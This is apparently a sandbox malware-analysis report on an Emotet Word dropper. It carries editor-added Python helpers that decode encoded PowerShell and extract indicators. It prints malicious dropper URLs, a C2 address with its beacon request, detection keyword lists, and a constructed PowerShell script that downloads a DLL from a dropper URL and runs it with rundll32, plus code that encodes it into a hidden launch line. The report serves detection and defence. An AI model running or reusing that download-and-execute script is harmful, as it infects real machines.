Analysis Report Order.doc

Overview

General Information

Sample Name: Order.doc
Analysis ID: 344065
MD5: 1a0ae833990a558910254e9bebfaeeaf
SHA1: c6f348043fb590f9638ed792a331695475b79af1
SHA256: 5648715fe9ed7418d2d2b101a4ae8f4bb814ac68e422f78641595b37a83eb84e
Tags: Heodo

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
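Several of the signatures above (Encrypted powershell cmdline option found, Sigma detected: Suspicious Encoded PowerShell Command Line, Obfuscated command line found, Very long command line found) describe the same launch pattern: WINWORD.EXE starting powershell.exe with a base64 -EncodedCommand payload that downloads and runs the DLL. The report does not print the command line itself, so the triage helper below, an added example by the editor and not Joe Sandbox code, builds a constructed one from the download URL and drop path the report does record and then decodes and flags it. The length threshold, the switch list and the download/execution keyword lists are the editor's assumptions, not the sandbox's signature logic.

```python
import base64
import re

# powershell.exe resolves switch prefixes, so -e, -ec, -enc and -EncodedCommand all mean the
# same thing; the argument is the script encoded as UTF-16LE and then base64.
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Switches that usually accompany a malicious launch (editor's list, an assumption).
EVASION_SWITCHES = {
    "hidden-window": re.compile(r"(?i)[-/]w(?:indowstyle)?\s+hidden"),
    "no-profile": re.compile(r"(?i)[-/]nop(?:rofile)?\b"),
    "non-interactive": re.compile(r"(?i)[-/]noni(?:nteractive)?\b"),
    "execution-policy-bypass": re.compile(r"(?i)[-/](?:ep|executionpolicy)\s+bypass"),
}

# Assumed threshold; the cut-off behind "Very long command line found" is not stated in the report.
LONG_CMDLINE = 1024

DOWNLOAD_PRIMITIVES = re.compile(
    r"(?i)Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b")
EXEC_PRIMITIVES = re.compile(
    r"(?i)\brundll32\b|\bregsvr32\b|Start-Process|\bIEX\b|Invoke-Expression")


def decode_encoded_command(b64: str) -> str:
    """Reverse PowerShell's -EncodedCommand encoding (base64 over UTF-16LE)."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def triage_powershell_cmdline(cmdline: str) -> dict:
    """Return the suspicious features of a powershell.exe command line and the decoded script, if any."""
    result = {"length": len(cmdline), "flags": [], "decoded": None}
    if len(cmdline) >= LONG_CMDLINE:
        result["flags"].append("very-long-command-line")
    m = ENC_SWITCH.search(cmdline)
    if m:
        result["flags"].append("encoded-command")
        try:
            result["decoded"] = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            # binascii.Error is a ValueError; odd-length UTF-16 raises UnicodeDecodeError
            result["flags"].append("undecodable-encoded-command")
    for name, rx in EVASION_SWITCHES.items():
        if rx.search(cmdline):
            result["flags"].append(name)
    # Inspect the script body (decoded when it was encoded) for download-and-run primitives.
    body = result["decoded"] if result["decoded"] is not None else cmdline
    if DOWNLOAD_PRIMITIVES.search(body):
        result["flags"].append("downloader-primitive")
    if EXEC_PRIMITIVES.search(body):
        result["flags"].append("execution-primitive")
    return result


# Constructed stage-two script. The URL and the drop path are the ones the report records;
# the script text itself is invented for the example and is not the sample's real command line.
SAMPLE_SCRIPT = (
    "$u='http://nightlifemumbai.club/x/0wBD3/';"
    "$p=\"$env:USERPROFILE\\Cha1_5j\\Pzyrxyv\\J47K.dll\";"
    "(New-Object Net.WebClient).DownloadFile($u,$p);"
    "rundll32.exe $p,#1"
)


def build_sample_cmdline(script: str = SAMPLE_SCRIPT) -> str:
    """Encode a script the way a macro dropper does to produce an -enc launch line."""
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -nop -w hidden -noni -enc {enc}"


if __name__ == "__main__":
    verdict = triage_powershell_cmdline(build_sample_cmdline())
    print(verdict["flags"])
    print(verdict["decoded"])
```

Feeding the same function a real command line taken from Sysmon event 1 or a 4688 event with command-line auditing enabled gives the decoded script directly, which is usually faster than waiting for a sandbox run.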

Classification

AV Detection:

Antivirus detection for URL or domain
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ Avira URL Cloud: Label: malware
Source: http://nightlifemumbai.club/x/0wBD3/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll ReversingLabs: Detection: 39%
Multi AV Scanner detection for submitted file
Source: Order.doc Virustotal: Detection: 32%
Machine Learning detection for dropped file
Source: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll Joe Sandbox ML: detected

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090952094.0000000002AB0000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: nightlifemumbai.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49167 -> 190.55.186.229:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1 | Host: nightlifemumbai.club | Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 190.55.186.229
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: GOOGLEUS
Source: Joe Sandbox View ASN Name: TelecentroSAAR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /efl8dd1i/ HTTP/1.1 | DNT: 0 | Referer: 190.55.186.229/efl8dd1i/ | Content-Type: multipart/form-data; boundary=------------diOigcaeBsfw | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 190.55.186.229 | Content-Length: 6388 | Connection: Keep-Alive | Cache-Control: no-cache
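The two network artefacts worth turning into indicators are the "!"-separated download list recovered from powershell.exe memory (the macro stage tries each URL in turn until one returns the DLL) and the beacon rundll32.exe sends afterwards: a multipart/form-data POST straight to an IP address with no preceding DNS query, a Referer that simply echoes host and path, and an Internet Explorer compatibility-view User-Agent string sent by a process that is not a browser. The script below is an added example by the editor, not part of the report or of Joe Sandbox, covering both the "Potential dropper URLs found in powershell memory" entry and the HTTP request entries. The three input strings are constructed reproductions of the report's artefacts in the joined form the export uses (CRLFs between request line and headers dropped); the header-name list used to re-split that form is an assumption that covers this sample's headers.

```python
import re
from urllib.parse import urlsplit

# Constructed copies of three artefacts from the report.
MEMORY_STRING = (
    "http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!"
    "http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!"
    "https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/"
)
GET_REQUEST = "GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive"
POST_REQUEST = (
    "POST /efl8dd1i/ HTTP/1.1DNT: 0Referer: 190.55.186.229/efl8dd1i/"
    "Content-Type: multipart/form-data; boundary=------------diOigcaeBsfw"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
    "Host: 190.55.186.229Content-Length: 6388Connection: Keep-AliveCache-Control: no-cache"
)

# Header names used to re-split the joined export (assumption: covers this sample; extend as needed).
KNOWN_HEADERS = ("Accept", "Accept-Encoding", "Cache-Control", "Connection", "Content-Length",
                 "Content-Type", "DNT", "Host", "Referer", "User-Agent")
_HEADER_START = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in KNOWN_HEADERS))
_REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d")
_BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def split_dropper_list(s: str) -> list:
    """The dropper keeps its candidate payload URLs as one '!'-separated string."""
    return [u for u in s.split("!") if u.startswith(("http://", "https://"))]


def parse_request(s: str) -> dict:
    """Parse a request whether its headers are CRLF-separated, ' | '-separated, or run together."""
    joined = re.sub(r"\r?\n|\s\|\s", "", s.strip())
    m = _REQUEST_LINE.match(joined)
    if not m:
        raise ValueError("not an HTTP request line: %r" % s[:40])
    headers = {}
    for chunk in _HEADER_START.split(joined[m.end():]):   # zero-width split at each header name
        if chunk:
            name, _, value = chunk.partition(": ")
            headers[name] = value
    return {"method": m.group("method"), "path": m.group("path"), "headers": headers}


def c2_indicators(req: dict) -> list:
    """Traits of the beacon that are visible in the captured request alone."""
    h, flags = req["headers"], []
    host = h.get("Host", "")
    if _BARE_IPV4.match(host):
        flags.append("host-is-bare-ip")        # pairs with the "TCP traffic without DNS query" events
    if req["method"] == "POST" and h.get("Content-Type", "").startswith("multipart/form-data"):
        flags.append("multipart-post")
    if h.get("Referer", "").split("://")[-1] == host + req["path"]:
        flags.append("referer-echoes-host-and-path")
    if "User-Agent" not in h:
        flags.append("no-user-agent")          # the GET to the dropper host sends none at all
    elif "MSIE 7.0" in h["User-Agent"] and "Trident/7.0" in h["User-Agent"]:
        flags.append("ie-compat-view-user-agent")   # a browser UA, but the sender is rundll32.exe
    return flags


def extract_iocs(memory_string: str, requests: list) -> dict:
    """Collapse the artefacts into a blocklist-ready summary."""
    urls = split_dropper_list(memory_string)
    iocs = {"dropper_urls": urls,
            "dropper_hosts": sorted({urlsplit(u).hostname for u in urls}),
            "c2": []}
    for raw in requests:
        req = parse_request(raw)
        flags = c2_indicators(req)
        if "host-is-bare-ip" in flags and "multipart-post" in flags:
            iocs["c2"].append({"host": req["headers"]["Host"], "path": req["path"], "flags": flags})
    return iocs


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(MEMORY_STRING, [GET_REQUEST, POST_REQUEST]), indent=2))
```

The URL list is the part worth blocking first: the compromised WordPress hosts in it rotate between campaigns, while the beacon's shape (POST to a bare IP, Referer equal to host plus path, multipart body) is stable enough to be worth a proxy rule on its own.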
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229 (reported 10 times)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07A78F5-D643-47FF-B622-0CF30ED55516}.tmp
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1 | Host: nightlifemumbai.club | Connection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2097800284.000000001B3E0000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: nightlifemumbai.club
Source: unknown HTTP traffic detected: POST /efl8dd1i/ HTTP/1.1 | DNT: 0 | Referer: 190.55.186.229/efl8dd1i/ | Content-Type: multipart/form-data; boundary=------------diOigcaeBsfw | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 190.55.186.229 | Content-Length: 6388 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Mon, 25 Jan 2021 22:13:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 
3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
